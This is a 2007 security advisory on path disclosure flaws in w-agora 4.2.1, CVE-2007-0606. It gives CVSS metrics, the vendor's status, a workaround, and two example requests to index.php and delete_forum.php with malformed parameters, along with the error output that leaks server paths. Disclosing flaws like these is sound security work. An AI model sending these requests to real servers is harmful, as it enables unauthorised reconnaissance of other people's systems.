netVigilance Security Advisory #14 w-agora version 4.2.1 Multiple Path Disclosure Vulnerabilities Description: w-agora is a set of scripts written in PHP. This package is intended to allow users to share, exchange and publish information, files and discussions over the web. Multiple path disclosure vulnerabilities allow the attacker to disclose the true path of the server-side scripts. Advisory URL: http://www.netvigilance.com/advisory0014 External References: Mitre CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0606 NVD NIST: http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-0606 OSVDB: 31668 http://www.osvdb.com/displayvuln.php?osvdb_id=31668 OSVDB: 31669 http://www.osvdb.com/displayvuln.php?osvdb_id=31669 Summary: w-agora is a set of scripts written in PHP intended to allow users to share, exchange and publish information, files and discussions over the web. Security issues in the product allow attackers to gather the true path of the server-side scripts. This vulnerabilities can be exploited only when PHP register_globals is On. Release Date: March 19, 2007 Severity: Risk: Low CVSS Metrics Access Vector: Remote Access Complexity: Low Authentication: not-required Confidentiality Impact: Partial Integrity Impact: None Availability Impact: None Impact Bias: Normal CVSS Base Score: 2.3 Target Distribution on Internet: Low Exploitability: Functional Exploit Remediation Level: Workaround Report Confidence: Uncorroborated Vulnerability Impact: Attack Host Impact: Path disclosure. SecureScout Testcase ID: TC 17941 Vulnerable Systems: w-agora version 4.2.1 Vulnerability Type: Program flaw ? The delete_forum.php and index.php scripts have flaws which lead to Warnings or even Fatal Errors. Vendor: Author Marc Druilhe. Vendor Status: The Vendor has been notified on January 30th 2007, and has not responded. Workaround: Set PHP register_globals to Off. Disable warning messages: modify in the php.ini file following line: display_errors = Off. Or modify .htaccess file (this will work only for the apache servers). Example: Path Disclosure Vulnerability 1: REQUEST http://[TARGET]/[w-agora-directory]/index.php?bn[]=1 REPLY <!--error--><br /> <b>Warning</b>: basename() expects parameter 1 to be string, array given in <b> http://[TARGET]/[w-agora-directory]\index.php</b> on line <b>29</b><br /> <script language=JavaScript src='/errors__/phperror_js.php'></script>ERROR_NO_CONFIG_FILEconf/site_agora.php Path Disclosure Vulnerability 2: http://[TARGET]/[w-agora-directory]/delete_forum.php?remove_site=1&cfg_dir=1&bn=1&ext=1&bn=&site_cfg_file=1 REPLY <!--error--><br /> <b>Fatal error</b>: Call to undefined function: msgform() in <b> http://[TARGET]/[w-agora-directory]\delete_forum.php</b> on line <b>22</b><br /> <script language=JavaScript src='/errors__/phperror_js.php'></script> Credits: Jesper Jurcenoks Co-founder netVigilance, Inc www.netvigilance.com